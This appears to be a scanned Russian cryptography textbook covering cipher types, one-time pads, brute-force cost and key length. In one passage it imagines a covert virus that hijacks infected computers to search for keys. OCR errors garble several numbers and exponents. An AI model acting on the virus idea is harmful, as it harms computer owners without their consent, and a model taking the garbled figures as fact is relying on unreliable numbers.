Криптографический алгоритм называется безусловно стойким, если вне зависимости от того каким объемом перехваченного шифртекста располагает криптоаналитик, у него нет достаточной информации, чтобы восстановить исходный открытый текст. Существует всего один безусловно стойкий шифр (о нем речь пойдет ниже). Все остальные шифры можно вскрыть с помощью атаки со знанием только шифртекста: достаточно перебрать все возможные ключи и проверить, имеет ли смысл открытый текст, полученный с их помощью.

Сложность криптоаналитической атаки

Сложность криптоаналитической атаки на алгоритм шифрования может быть охарактеризована с помощью трех величин:

  • Сложность по данным. Количество входных данных, необходимое для успешной криптоаналитической атаки на алгоритм шифрования.
  • Вычислительная сложность.
  • Время, требуемое для успешной криптоаналитической атаки на алгоритм шифрования.

  • Сложность по памяти. Объем памяти, которая нужна для успешной криптоаналитической атаки на алгоритм шифрования.

Часто под сложностью криптоаналитической атаки понимается максимальная среди этих величин. А для некоторых атак приходится искать компромисс между сложностью по данным, вычислительной сложностью и сложностью по памяти. Например, для реализации более быстрой атаки может потребоваться дополнительная память.

Сложность криптоаналитической атаки, как правило, выражается в виде экспоненциальной функции. К примеру, если атака имеет сложность 2 128 , то это значит, что для взлома шифра требуется выполнить 2 128 операций.

При оценке сложности атаки часто приходится оперировать очень большими числами. Чтобы было понятно, насколько они велики, в табл. 5.1 для них приведены некоторые физические аналогии.

Таблица 5.1. Физические аналогии для очень больших чисел


Физическая аналогия

  Число

Время, оставшееся до наступления следующего ледникового  периода

16-10 3 (2 14 ) лет

Время, оставшееся до превращения Солнца в новую звезду

10 9 (2 30 ) лет

Возраст Земли

10 9 (2 30 ) лет

Возраст Вселенной

10 10 (2 32 ) лет

Количество атомов, из которых состоит Земля

10 51 (2 170 )
Количество атомов, из которых состоит Солнце 10 57 (2 190 )
Количество атомов, из которых состоит наша Галактика 10 67 (2 223 )
Количество атомов, из которых состоит Вселенная 10 77 (2 265 )
Объем Вселенной 10 84 (2 280 )см 3

В то время как сложность атаки на данный алгоритм шифрования является постоянной величиной (по крайней мере, до тех пор, пока криптоаналитик не придумает более эффективный метод взлома), вычислительная мощь современных компьютеров растет буквально не по дням, а по часам. Такой феноменальный рост наблюдается в течение последних пятидесяти лет, и есть все основания полагать, что в ближайшее время данная тенденция сохранится. Большинство криптоаналитических атак идеально подходят для реализации на параллельных компьютерах: полномасштабная атака на шифр разбивается на миллионы крошечных атак, которые ведутся независимо друг от друга и, следовательно, не требуют организации взаимодействия между процессорами. Поэтому в корне неверно заявлять о достаточной вычислительной стойкости алгоритма шифрования только потому, что его невозможно взломать при современном уровне развития технологии. Хорошая криптосистема всегда проектируется с достаточным запасом на будущее.
При этом необходимо принимать во внимание прогнозируемый рост компьютерной производительности, чтобы алгоритм шифрования оставался вычислительно стойким в течение многих лет.

3. Шифры замены и перестановки

Шифры замены и перестановки

Шифры появились на свет задолго до изобретения компьютера. Получившие широкое распространение криптографические алгоритмы выполняли либо замену одних букв на другие, либо переставляли буквы друг с другом. Самые стойкие шифры делали одновременно и то, и другое, причем многократно.

Шифры замены

Шифром замены называется алгоритм шифрования, который производит замену каждой буквы открытого текста на какой-то символ шифрованного текста. Получатель сообщения расшифровывает его путем обратной замены.

В классической криптографии различают 4 разновидности шифров замены:

  • Простая замена, или одноалфавитный шифр. Каждая буква открытого текста заменяется на один и тот же символ шифртекста.
  • Омофонная замена. Аналогична простой замене с единственным отличием: каждой букве открытого текста ставятся в соответствие несколько символов шифртекста. Например, буква "А" заменяется на цифру 5, 13, 25 или 57 , а буква "Б" — на 7, 19, 31 или 43 и так далее.
  • Блочная замена. Шифрование открытого текста производится блоками. Например, блоку "АБА" может соответствовать "РТК", а блоку "АББ" — "СЛЛ".
  • Многоалфавитная замена. Состоит из нескольких шифров простои замены. Например, могут использоваться пять шифров простой замены, а какой из них конкретно применяется для шифрования данной буквы открытого текста, — зависит от ее положения в тексте.

Примером шифра простой замены может служить программа ROT13, которую обычно можно найти в операционной системе UNIX. С ее помощью буква "А" открытого текста на английском языке заменяется на букву "N", "В" — на "О" и так далее. Таким образом, ROT13 циклически сдвигает каждую букву английского алфавита на 13 позиций вправо. Чтобы получить исходный открытый текст надо применить функцию шифрования ROT 13 дважды:

Р = ROT13(ROT13(P))

Все упомянутые шифры замены легко взламываются с использованием современных компьютеров, поскольку замена недостаточно хорошо маскирует стандартные частоты встречаемости букв в открытом тексте.

Разновидностью шифра замены можно считать код, который вместо букв осуществляет замену слов, фраз и даже целых предложений. Например, кодовый текст "ЛЕДЕНЕЦ" может соответствовать фразе открытого текста "ПОВЕРНУТЬ ВПРАВО НА 90°". Однако коды применимы только при определенных условиях: если, например, в коде отсутствует соответствующее значение для слова "МУРАВЬЕД", то вы не можете использовать это слово в открытом тексте своего сообщения, предназначенном для кодирования.

Шифры перестановки

В шифре перестановки буквы открытого текста не замещаются на другие, а меняется сам порядок их следования. Например, в шифре простой колонной перестановки исходный открытый текст записывается построчно (число букв в строке фиксировано), а шифртекст получается считыванием букв по колонкам. Расшифрование производится аналогично: шифртекст записывается поколонно, а открытый текст можно затем прочесть по горизонтали.

Для повышения стойкости полученный шифртекст можно подать на вход второго шифра перестановки. Существуют еще более сложные шифры перестановки, однако почти все они легко взламываются с помощью компьютера.

Хотя во многих современных криптографических алгоритмах и используется перестановка, ее применение ограничено узкими рамками, поскольку в этом случае требуется память большого объема, а также накладываются ограничения на длину шифруемых сообщений. Замена получила значительно большее распространение.

Роторные машины

В 20-е годы были изобретены разнообразные механические устройства призванные автоматизировать процесс шифрования и расшифрования. Большинство из них состояло из клавиатуры для ввода открытого текста набора роторов — специальных вращающихся колес, каждое из которых реализовывало простую замену. Например, ротор мог заменять "А" на "Ф". "Б" на "У", "С" на "Л" и т. д. При этом выходные контакты одного ротора подсоединялись к входным контактам следующего за ним.

Тогда, например, если на клавиатуре 4-роторной машины нажималась клавиша "А", то первый ротор мог превратить ее в "Ф", которая, пройдя через второй ротор, могла стать буквой "Т", которую третий ротор мог заменить на букву "К", которая могла быть преобразована четвертым ротором в букву "F" шифртекста. После этого роторы поворачивались, и в следующий раз заме на была иной. Чтобы сбить с толку криптоаналитиков, роторы вращались с разной скоростью.

Наиболее известной роторной машиной стала немецкая "Энигма", которую Германия использовала для засекречивания своей переписки во время Второй мировой войны.

Операция сложения по модулю 2

Операция сложения по модулю 2, которая в языке программирования С обозначается знаком ^ , а в математике — знаком Å , представляет собой стандартную операцию над битами:

0 Å  0 = 0

0 Å  1 = 1

1 Å  0 = 1

1 Å  1 = 0

С помощью сложения по модулю 2 можно выполнять многоалфавитную замену, прибавляя к битам ключа соответствующие биты открытого текста. Этот алгоритм шифрования является симметричным. Поскольку двойное прибавление одной и той же величины по модулю 2 восстанавливает исходное значение, шифрование и расшифрование выполняются одной и тон же программой.

К сожалению, данный алгоритм обладает очень слабой стойкостью. Тем не менее АНБ одобрило его использование в цифровых сотовых телефонах американских производителей для засекречивания речевых переговоров. Он также часто встречается в различных коммерческих программных продуктах.

Следует помнить, что с помощью данного алгоритма вы можете надежно спрятать от человека, не сведущего в криптоанализе, содержание своей переписки, однако опытному криптоаналитику понадобится всего несколько минут, чтобы его взломать. Делается это очень просто, если предположить. например, что открытый текст сообщения написан на английском языке.

1. Сначала следует определить длину ключа. Шифртекст последовательно складывается по модулю 2 со своей копией, сдвинутой на различное число байт, и в полученном векторе подсчитывается число совпадающих компонентов. Когда величина сдвига кратна длине ключа, это число превысит 6% от общей длины исследуемого шифртекста. Если не кратна, то совпадений будет меньше 0,4%. Проанализировав полученные данные, можно сделать обоснованный вывод о длине ключа.

2. Затем надо сложить шифртекст по модулю 2 со своей копией, сдвинутой на величину длины ключа. Эта операция аннулирует ключ и оставит в наличии открытый текст сообщения, сложенный по модулю 2 со своей копией, сдвинутой на величину длины ключа.

4. Одноразовые блокноты

Хотите верьте, хотите нет, но на самом деле все-таки существует алгоритм шифрования, который невозможно вскрыть. Зовется он одноразовым блокнотом. В классическом виде одноразовый блокнот представляет собой очень длинную последовательность случайных букв, записанную на листах бумаги, которые скреплены между собой в блокнот. Отправитель использует каждую букву из блокнота, чтобы зашифровать ровно одну букву открытого текста сообщения. Шифрование состоит в сложении буквы открытого текста и буквы из одноразового блокнота по модулю N, где N — количество букв в алфавите. После зашифрования отправитель уничтожает использованный одноразовый блокнот. Чтобы отправить новое сообщение, ему придется изготовить или найти новый одноразовый блокнот.

Получатель, владеющий копией одноразового блокнота, которым воспользовался отправитель сообщения, получает открытый текст путем сложения букв шифртекста и букв, извлеченных из имеющейся у него копии одноразового блокнота. Эту копию он затем уничтожает.

Если предположить, что у криптоаналитика нет доступа к одноразовому блокноту, данный алгоритм шифрования абсолютно надежен. Перехваченному шифрованному сообщению с одинаковой вероятностью соответствует произвольный открытый текст той же длины, что и сообщение.

Однако у алгоритма шифрования с помощью одноразового блокнота есть весьма существенный недостаток. Последовательность букв, которая содержится в одноразовом блокноте, должна быть по-настоящему случайной, а не просто псевдослучайной, поскольку любая криптоаналитическая атака на него будет, в первую очередь, направлена против метода генерации содержимого этого блокнота.

Другая важная особенность применения одноразового блокнота состоит в том, чтобы никогда не пользоваться им дважды, поскольку криптоанадитпк может отыскать участки сообщений, для шифрования которых был применен один и тот же одноразовый блокнот. Делается это следующим образом. Нужно последовательно сдвигать одно сообщение относительно другою и подсчитывать количество совпадений. Как только это количество резко увеличится, значит, случайная последовательность, использованная для зашифрования двух различных отрезков сообщений, была одной и той же. Дальнейший криптоанализ осуществляется достаточно просто.

Одноразовые блокноты могут состоять не из байтов, а из битов. Тогда шифрование будет заключаться в выполнении сложения по модулю 2. Для получения открытого текста достаточно опять сложить по модулю 2 шифртекст и содержимое одноразового блокнота. Надежность будет по-прежнему такой же, как при посимвольном модульном сложении.

Еще один недостаток блокнотного способа шифрования заключается в том, что случайная последовательность должна быть той же длины, что и само сообщение. Чтобы послать короткую шифровку резиденту, одноразовый блокнот еще сгодится, но как быть с каналом связи, пропускная способность которого измеряется десятками мегабит в секунду?

Конечно, при необходимости можно для хранения случайных последовательностей воспользоваться компакт-дисками с многократной перезаписью или цифровой магнитной лентой. Однако это будет достаточно дорогостоящее решение проблемы. Кроме того, необходимо будет обеспечить синхронную работу приемной и передающей аппаратуры, а также отсутствие искажений при передаче. Ведь даже если несколько бит сообщения пропущены при его пересдаче, получатель так и не сможет прочесть открытый текст.

Несмотря на все перечисленные выше недостатки, в настоящее время одноразовые блокноты активно используются для шифрования сверхсекретных сообщений. Не имея в своем распоряжении соответствующего блокнота, эти сообщения невозможно прочитать вне зависимости от того, насколько быстро работают суперкомпьютеры, которые используются в ходе криптоана-литической атаки. Даже инопланетные пришельцы со своими сверхсветовыми звездолетами и чудо-компьютерами не смогут их прочесть, если. конечно, не вернутся в прошлое на машине времени и не добудут одноразовые блокноты, использованные для шифрования этих сообщений.

5. Компьютерные алгоритмы шифрования

 

 

Существует великое множество алгоритмов шифрования, придуманных специально в расчете на реализацию в виде компьютерных программ. Среди наиболее известных можно упомянуть:

  • Data Encryption Standard (DES). Симметричный алгоритм шифрования, являющийся в США государственным стандартом.
  • RSA. Алгоритм шифрования с открытым ключом, названный по первым буквам фамилий его создателей (Rivest, Shamir, Adleman).
  • ГОСТ 28147-89. Симметричный алгоритм шифрования, одобренный сначала в СССР, а затем и в России для использования в качестве государственного стандарта.
 

Глава 6. Криптографические ключи

Глава 6. Криптографические ключи

1. Длина секретного ключа

 

Длина секретного ключа

Надежность симметричной криптосистемы зависит от стойкости используемого криптографического алгоритма и от длины секретного ключа. Допустим, что сам алгоритм идеален — вскрыть его можно только путем опробования всех возможных ключей. Этот вид криптоаналитической атаки называется методом тотального перебора. Чтобы применить данный метол, криптоаналитику понадобится немного шифртекста и соответствующий открытый текст. Например, в случае блочного шифра ему достаточно получить в свое распоряжение по одному блоку шифрованного и соответствующего открытого текста. Сделать это не так уж и трудно.

Криптоаналитик может заранее узнать содержание сообщения, а затем перехватить его при передаче в зашифрованном виде. По некоторым признакам он также может догадаться, что посланное сообщение представляет собой не что иное, как текстовый файл, подготовленный с помощью распространенного редактора, компьютерное изображение в стандартном формате, каталог файловой подсистемы или базу данных. Для криптоаналитика важно то, что в каждом из этих случаев в открытом тексте перехваченного шифрсообщения известны несколько байтов, которых ему хватит, чтобы предпринять атаку со знанием открытого текста.

Подсчитать сложность атаки методом тотального перебора достаточно просто. Если ключ имеет длину 64 бита, то суперкомпьютер, который может опробовать 1 млн ключей за 1 с, потратит более 5 тыс. лет на проверку всех возможных ключей. При увеличении длины ключа до 12cS бит, этому же суперкомпьютеру понадобится 10 25 лет, чтобы перебрать все ключи. Вселенная существует всего-навсего 10'° лет, поэтому можно сказать, что 10- — это достаточно большой запас надежности для тех, кто пользуется 128-5ишымп ключами.

Однако прежде чем броситься спешно изобретать криптосистему с длиной ключа в 4 Кбайт, следует вспомнить о сделанном выше предположении, а именно: используемый алгоритм шифрования идеален в том смысле, что вскрыть его можно только методом тотального перебора. Убедиться в этом на практике бывает не так просто, как может показаться на первый взгляд. Криптография требует утонченности и терпения. Новые сверхсложные криптосистемы при более внимательном рассмотрении зачастую оказываются очень нестойкими. А внесение даже крошечных изменений в стойкий криптографический алгоритм может существенно понизить его стойкость. Поэтому надо пользоваться только проверенными шифрами, которые известны уже в течение многих лет, и не бояться проявлять болезненную подозрительность по отношению к новейшим алгоритмам шифрования, вне зависимости от заявлений их авторов об абсолютной надежности этих алгоритмов.

Важно также не забывать о правиле Керкхоффа: стойкость алгоритма шифрования должна определяться ключом, а не деталями самого алгоритма. Чтобы быть уверенным в стойкости используемого шифра, недостаточно проанализировать его при условии, что противник досконально знаком с алгоритмом шифрования. Нужно еще и рассмотреть атаку на этот алгоритм, при которой враг может получить любое количество шифрованного и соответствующего открытого текста. Более того, для повышения надежности следует предположить, что криптоаналитик имеет возможность организовать атаку с выбранным открытым текстом произвольной длины.

К счастью, в реальной жизни большинство людей, интересующихся содержанием ваших шифрованных файлов, не обладают квалификацией высококлассных специалистов и вычислительными ресурсами, которые имеются в распоряжении правительств мировых супердержав. Последние же вряд ли будут тратить время и деньги, чтобы прочесть ваше пылкое сугубо личное послание. Однако, если вы планируете свергнуть "антинародное правительство", вам необходимо всерьез задуматься о стойкости применяемого алгоритма шифрования.

Сложность и стоимость атаки методом тотального перебора

Атака методом тотального перебора, как правило, представляет собой разновидность атаки со знанием открытого текста. Если предположить, что атака методом тотального перебора является наиболее эффективной среди возможных атак на используемый вами симметричный алгоритм шифрования. то ключ должен быть достаточно длинным, чтобы успешно отразить эту атаку. Насколько длинным?

Среди параметров, которые необходимо принимать во внимание при рассмотрении атаки методом тотального перебора, прежде всего, надо упомянуть об общем количестве проверяемых ключей и о времени, затрачиваемом противником на проверку одного ключа. Количество ключей для конкретною алгоритма обычно фиксировано. Например, DES-алгоритм использует 56-битный ключ. Это означает, что его ключевое пространство содержит 2 56 ключей.

Скорость проверки ключей играет менее важную роль, чем их количество. Для простоты изложения можно считать, что вне зависимости от алгоритма шифрования, время, которое требуется на проверку одного ключа, одинаково. На практике данное предположение неверно, и для разных криптографических алгоритмов это время может различаться в десятки раз. Поскольку нашей целью является отыскание такой длины ключа, при которой стойкость алгоритма шифрования против атаки методом тотального перебора в миллионы раз превышает предел, делающий эту атаку неосуществимой на практике, то сделанное нами предположение вполне оправдано.

При решении вопроса о достаточной длине ключа в качестве алгоритма шифрования чаще всего рассматривается DES-алгоритм. В 1977 г. американские криптологи У. Диффи (W.Diffie) и М. Хеллман (M.Hellman) заявили, что при существующем уровне развития компьютерной технологии можно построить специализированный суперкомпьютер для вскрытия ключей DES-алгоритма методом тотального перебора. Имея в своем составе 1 млн микросхем, каждая из которых способна проверять 1 млн ключей в секунду, этот суперкомпьютер перебрал бы все 2 56 ключей за 20 час.

Атака методом тотального перебора идеально подходит для реализации на параллельном суперкомпьютере, состоящем из многих процессоров. Отдельным процессорам, ведущим поиск ключа, нет необходимости устанавливать связь с другими процессорами суперкомпьютера во время выполнения своей части поиска. Следовательно, все процессоры специализированного суперкомпьютера, предназначенного для параллельного поиска ключей, необязательно находятся даже в одном городе, не говоря уже об одном помещении.

В 1993 г. американский криптолог М. Винер (M.Wiener) спроектировал суперкомпьютер для атаки на DES-атгоритм методом тотального перебора. Рассуждения Винера верны не только для DES-алгоритма, но и практически для любого другого алгоритма шифрования. Суперкомпьютер, разработанный Винером, состоит из специализированных микросхем, плат и стоек. По мнению Винера, для того чтобы гарантировать вскрытие 56-битного ключа за 7 час, на изготовление такого суперкомпьютера потребуется не более 1 млн долларов. По закону Мура, вычислительная мощь компьютеров улавливается каждые полтора года. Поэтому к 2001 г. стоимость суперкомпьютера, придуманного Винером, уменьшится в 10 раз и составит всего-навсего 100 тыс. долларов. Это означает, что уже сейчас крупные компании и "крутые" криминальные структуры могут вскрывать 56-битные ключи. Для военных криптоаналитиков в большинстве индустриально развитых стран доступны 64-битные ключи.

В 1996 г. Диффи, Винер и другие авторитетные американские криптологи опубликовали результаты своей исследовательской работы по определению длины ключа, необходимой для адекватной защиты информации от атаки методом тотального перебора (табл. 6.1).

Таблица 6.1. Стоимость и вычислительная сложность атаки методом тотального перебора


Кто атакует Бюджет Сложность атаки Стойкий ключ
40 бит 56 бит
Хакер 1000 долл. 1 неделя Никогда 45 бит
Малый бизнес 10 тыс. долл. 12 мин. 556 дней 64 бита
Крупная компания 10 млн долл. 0.005 с 6 мин 70 бит
Федеральное агентство 300 млн долл. 0.0002 с 12с 75 бит

К приведенным в табл. 6.1 цифрам следует относиться с осторожностью. Теоретический расчет затрат на проведение атак методом тотального перебора на криптографические ключи разной длины всегда существенно отличается от того, с чем криптоаналитики сталкиваются на практике при покупке или разработке суперкомпьютеров для ведения такого рода атак. Объясняется это тем, что одни сделанные допущения оказываются весьма далеки от реальности, в то время как другие факторы просто не принимаются во внимание. В данном случае Диффи, Винер и другие посчитали, что при создании специализированного суперкомпьютера для атаки методом тотального перебора будут использоваться заказные микросхемы ценой не более 10 долл. По оценкам АНБ, такие микросхемы стоят, как правило, в 100 раз дороже. У АНБ вызвало сомнение и допущение о том, что вне зависимости от алгоритма шифрования, лишь длина ключа определяет сложность криптоаналитической атаки. Кроме того, при составлении таблицы не были учтены затраты на научно-исследовательские и опытно-конструкторские работы, которые для первого экземпляра суперкомпьютера обычно составляют не менее 10 млн долл. Не были также приняты во внимание расходы на приобретение компьютерной памяти.

Из сказанного можно сделать весьма важный вывод. Если кто-то очень захочет узнать использованный вами ключ, ему нужно всего лишь потратить достаточное количество денег. Поэтому определяющей является стоимость зашифрованной вами информации. Если цена ей в базарный день — около 2 долл., вряд ли кто-то решится потратить 1 млн, чтобы ее заполучить. Но если прибыль от прочтения вашей шифровки составляет 100 млн долл.. — берегитесь! Единственным утешением может послужить тот факт, что с течением времени любая информация очень быстро устаревает и теряет свою ценность.

Программная атака

Без специализированного компьютерного оборудования, ведущего параллельный поиск ключей, атака методом тотального перебора имеет значительно меньше шансов на успех. Однако если вы не припасли лишний миллион долларов, который можно потратить на изготовление такого оборудования, есть другой, более дешевый, способ попытаться вскрыть интересующий вас ключ.

В мире имеется огромное количество компьютеров (по оценкам экспертов, в 1996 г. их число достигло 200 млн), которые, чтобы не простаивать, могли бы опробовать ключи. Эксперимент, проведенный в начале 1997 г., показал, что таким способом за две недели можно вскрыть 48-битный ключ. И хотя этот ключ был найден методом тотального перебора после проверки чуть более половины всех возможных ключей, полученный результат впечатляет, поскольку в ходе атаки одновременно использовались не более 5 тысяч компьютеров из существующих 200 миллионов, а в общей сложности в атаке оказались задействованными лишь 7 тысяч компьютеров.

Основное препятствие на пути к использованию миллионов вычислительных устройств, разбросанных по всему миру, заключается в невозможности сделать так, чтобы их владельцы приняли участие в атаке. Можно, конечно,  вежливо попросить каждого из них об услуге, но во-первых, на это уйдет уйма времени, а во-вторых, ответом в большинстве случаев будет, скорее всего, твердое "нет". Можно попытаться тайком проникнуть на чужие компьютеры через сеть, но на это понадобится еще больше времени, да вдобавок вас могут арестовать.

Более разумным представляется создание компьютерного вируса, который вместо того, чтобы стирать файлы с жесткого диска и выдавать на дисплей % глупые сообщения, незаметно для владельца компьютера будет перебирать возможные ключи. Проведенные исследования показывают, что в распоряжении вируса будет от 70 до 90% процессорного времени зараженного им компьютера. После вскрытия ключа вирус может породить новый вирус, содержащий информацию о найденном ключе, и отправить его странствовать по компьютерной сети до тех пор, пока он не доберется до своего хозяина.

При более тонком подходе вирус, обнаруживший ключ, выдаст на экран компьютера информацию вида:

В ВАШЕМ КОМПЬЮТЕРЕ ОБНАРУЖЕНА СЕРЬЕЗНАЯ ОШИБКА!

ПОЖАЛУЙСТА, ПОЗВОНИТЕ ПО ТЕЛЕФОНУ (095)123-45-67

И ЗАЧИТАЙТЕ ОПЕРАТОРУ СЛЕДУЮЩЕЕ 48-БИТОВОЕ ЧИСЛО:

хххххххх ххххххх ххххххх ххххххх ххххххх ххххххх

ПЕРВОМУ, КТО СООБЩИТ ОБ ЭТОЙ ОШИБКЕ, ГАРАНТИРОВАНО

ВОЗНАГРАЖДЕНИЕ В РАЗМЕРЕ 100 (СТА) ДОЛЛАРОВ.

Если вирусу удастся заразить 10 млн компьютеров, каждый из которых станет проверять хотя бы 1 тыс. ключей в секунду, то 56-битный ключ будет найден менее чем через 3 месяца. Дополнительно придется раскошелиться на подкуп производителей антивирусных программ, однако к компьютерной криптографии, о которой сейчас идет речь, эта проблема никакого отношения не имеет.

"Китайская лотерея"

Допустим, что для атаки методом тотального перебора во всякий без исключения китайский радиоприемник и телевизор встраивается специальная микросхема, проверяющая 1 млн ключей в секунду. Каждая из них автоматически перебирает свое подмножество ключей после получения из эфира фрагментов шифрованного и соответствующего открытого текста. Как только правительство Китая пожелает вскрыть какой-нибудь ключ, оно принимает постановление, которое обязывает всех владельцев телевизоров и радиоприемников включить свои аппараты в определенное время, чтобы они могли принять пару фрагментов текста и приступить к перебору ключей.

За найденный ключ полагается значительный приз. Благодаря этому радиоприемники и телевизоры со встроенными микросхемами хорошо раскупаются, а вскрытые ключи своевременно доводятся до сведения китайского правительства. Если учесть, что у каждого из десяти китайцев есть радиоприемник или телевизор, то получится, что на вскрытие 64-битного ключа китайскому правительству потребуется самое большее 43 часа. В табл. 6.2 приведена сложность вскрытия 64-битного ключа с помощью "китайской лотереи" при ее проведении в Китае, а также в США, Ираке и Израиле.

Таблица 6.2. Сложность вскрытия 64-битного ключа с помощью "китайской лотереи"

Страна Численность населения Количество телевизоров и радиоприемников Сложность вскрытия 64-битового ключа с помощью "китайской лотереи"
Китай

 

1 190 431 000  257 000 000 43 часа
США 260 714 000 739 000 000 6,9 часов
Ирак 19 890 000 4 730 000 44 дня
Израиль 5 051 000 3 640 000 58 дней

Биотехнология

Предположим такую ситуацию: с использованием генной инженерии удалось вывести особую породу травоядных динозавров. Их нарекли "криптозаврами", поскольку они состоят из клеток, которые могут проверять криптографические ключи. Шифрованный и соответствующий открытый теки передаются в клетки криптозавра с помощью магнитооптических средин. Найденный ключ выводится специальными клетками, способными перемещаться в пределах тела криптозавра. Поскольку динозавр в среднем состоит из 2 14 клеток, то при условии, что каждая из них успевает проверить 1 миллион ключей в секунду, на поиск 64-битного ключа уйдет не более 1 с.

Для этой же цели можно использовать клетки морских водорослей. Например, на площади в 500 км2 и на глубине в 1 м их можно разместить в количестве 1023. Если каждая из них будет обрабатывать 1 млн ключей в секунду. то 128-битный ключ будет вскрыт менее чем за сотню лет. Шифрованный и открытый тексты передаются водорослям с помощью спутника, а сигналом о нахождении искомого ключа служит изменение окраски водорослей вокруг клетки, отыскавшей этот ключ. За советами по разведению морских водорослей криптоаналитики могут обратиться на биологический факультет ближайшего университета.

Термодинамические ограничения

Из второго закона термодинамики следует, что для записи одного бита информации путем соответствующего изменения состояния среды требуется не менее kT эрг энергии, где k— постоянная Больцмана и Т— температура системы. Учитывая, что температура Вселенной составляет 3,2° по Кельвину, для изменения одного бита информации компьютеру понадобится не менее 4,4 10 -16 эрг энергии. Уменьшение температуры среды ниже уровня температуры Вселенной потребует дополнительных затрат энергии и поэтому не имеет особого смысла.

За год вся энергия, излучаемая Солнцем, составляет 1,21 10- 41 эрг. Ее хватит, чтобы произвести 2,7 1056 записей одного бита информации, что эквивалентно прогону 187-битного счетчика через все возможные состояния. Если наше довольно "прохладное" Солнце заменить сверхновой звездой, то счет-£ чик можно сделать 219-битным.

Сказанное означает, что атака методом тотального перебора против криптосистемы с 256-битным ключом энергетически неосуществима до тех пор, пока компьютеры являются объектами материального мира и их функционирование подчиняется его законам, в частности — второму закону термодинамики.

 

2. Однонаправленные функции

Однонаправленные функции

Понятие однонаправленной функции является основным в криптографии с открытым ключом. К однонаправленным относят такие функции, которые достаточно легко вычислить, но значительно труднее обратить. То есть, при наличии х нетрудно определить f(x), однако, при условии знания только f(x) на нахождение соответствующего значения х уйдут миллионы лет вычислений на всех компьютерах, которые только есть в мире.

Аналогом однонаправленной функции в быту является разбитая вдребезги стеклянная бутылка. Расколотить ее на мелкие осколки очень легко, однако попробуйте снова собрать целую бутылку из осколков!

Строгое математическое доказательство существования однонаправленных функций, а также правила их построения пока не придуманы. Тем не менее. существует множество функций, которые все считают однонаправленными: их значения довольно эффективно вычисляются, однако обратить эти функции каким-либо простым методом не удается. Хорошим примером может служить вычисление функции х 2 в конечных полях.

Какой прок от однонаправленных функций в криптографии? Ведь если с ее помощью зашифровать сообщение, прочесть его не сможет никто. Вернемся к аналогии с бутылкой. Напишите на ней открытый текст, разбейте ее вдребезги и дайте осколки своему приятелю, чтобы он прочитал написанный вами текст. И не забудьте упомянуть про однонаправленные функции, чтобы произвести на него должное впечатление вашими глубокими познаниями в криптографии! К сожалению, дальнейший путь этих осколков лежит только в мусорное ведро, ибо в таком виде ваше послание не примет ни одно почтовое отделение.

Поэтому в криптографии большим спросом пользуются однонаправленные функции с лазейкой, которые представляют собой особую разновидность однонаправленных функций. Однонаправленную функцию с лазейкой по-прежнему трудно обратить, но только не зная секрета вычисления обратной к ней функции. То есть, при данном х легко найти f(x) и наоборот — трудно отыскать х, зная одно лишь значение f(x). Однако существует такая секретная информация (у), что если известны у и f(x), то вычислить х будет значительно проще.

Хорошим аналогом однонаправленной функции с лазейкой служат обыкновенные часы. Их очень легко разобрать на большое количество мельчайших деталей, из которых потом будет весьма трудно снова собрать работающий часовой механизм. Однако при наличии инструкции по сборке часов сделать это не так и сложно.

Особый интерес для криптографов представляют однонаправленные хэш-функции. Алгоритмы хэширования, реализуемые с помощью хэш-функций, позволяют преобразовывать строки переменной длины, называемые образами, в строки фиксированной длины, которые принято именовать хэш-значениями. Обычно хэш-значение гораздо меньше любого из образов. Примером простейшей хэш-функции является преобразование байтовой строки в хэш-значение, равное одному байту, который получается сложением всех байтов этой строки по модулю 2. Однако такая кэш-функция не является однонаправленной: нетрудно подобрать строку символов, суммирование которых по модулю 2 даст заранее заданное значение.

Однонаправленная хэш-функция позволяет легко сгенерировать, хэш-значение. Однако, зная только его, будет очень трудно подобрать соответствующий ему образ. Качественная однонаправленная хэш-функция чаше всего является непротиворечивой: весьма сложно получить два различных образа, для которых хэш-значение будет одним и тем же.

Процесс хэширования в криптографии — не тайна. Однонаправленная хэш- функция обеспечивает необходимый уровень зашиты благодаря своей однонаправленности. По выходу такой хэш-функции невозможно сказать, что было подано на ее вход, а изменение даже одного бита образа приводит к смене в среднем половины бит соответствующего хэш-значения.

3. Длина открытого ключа

Длина открытого ключа

Многие современные алгоритмы шифрования с открытым ключом основаны на однонаправленности функции разложения на множители числа, являющегося произведением двух больших простых чисел. Эти алгоритмы также могут быть подвергнуты атаке, подобной методу тотального перебора. применяемому против шифров с секретным ключом, с одним лишь отличием: опробовать каждый ключ не потребуется, достаточно суметь разложить на множители большое число.

Конечно, разложение большого числа на множители — задача трудная. Однако сразу возникает резонный вопрос, насколько трудная. К несчастью для криптографов, сложность ее решения уменьшается. И что еще хуже, эта сложность падает значительно более быстрыми темпами, чем ожидалось ранее. Например, в середине 70-х годов считалось, что для разложения на множители числа из 125 цифр потребуются десятки квадрильонов лет. А всего два десятилетия спустя с помощью компьютеров, подключенных к сети Internet удалось разложить на множители число из 129 цифр. Этот прорыв стал возможен благодаря тому, что за прошедшие 20 лет были не только предложены новые, более быстрые, методы разложения на множители больших чисел, но и возросла производительность используемых компьютеров.

Поэтому квалифицированный криптограф должен проявлять очень большую осторожность и осмотрительность, когда речь заходит о длине открытою ключа. Необходимо учитывать, насколько ценна засекречиваемая с его помощью информация и как долго она должна оставаться в тайне для посторонних.

А почему, спрашивается, не взять 10000-битный ключ 9 Ведь тогда отпадут все вопросы, связанные со стойкостью асимметричного алгоритма шифрования с открытым ключом, основанном на разложении большого числа па множители. Но дело в том, что обеспечение достаточной стойкости шифра не является единственной заботой криптографа. Имеются дополнительные соображения, влияющие на выбор длины ключа, и среди них — вопросы. связанные с практической реализуемостью алгоритма шифрования при выбранной длине ключа.

Чтобы оценить длину открытого ключа, будем измерять доступную криптоаналитику вычислительную мощь в так называемых мопс-годах, т. е. количеством операций, которые компьютер, способный работать со скоростью 1 миллион операций в секунду, выполняет за год. Допустим, что хакер имеет доступ к компьютерным ресурсам общей вычислительной мощью 10000 мопс-лет, крупная корпорация — 107 мопс-лет, правительство — 109 мопс-лет. Это вполне реальные цифры, если учесть, что при реализации упомянутого выше проекта разложения числа из 129 цифр его участники задействовали всего 0,03% вычислительной мощи Internet, и чтобы добиться этого, им не потребовалось принимать какие-либо экстраординарные меры или выходить за рамки закона.

Предположим еще, что вычислительная мощь возрастает в 10 раз каждые 5 лет, а метод, который используется для разложения больших чисел на множители, позволяет это делать с трудоемкостью, указанной в табл. 6.3.

Таблица 6.3. Трудоемкость разложения больших чисел на множители


Количество бит в двоичном представлении числа Количество мопс-лет для разложения на множители
768 3-10 5
1024 3-10 7
1280 3-10 9
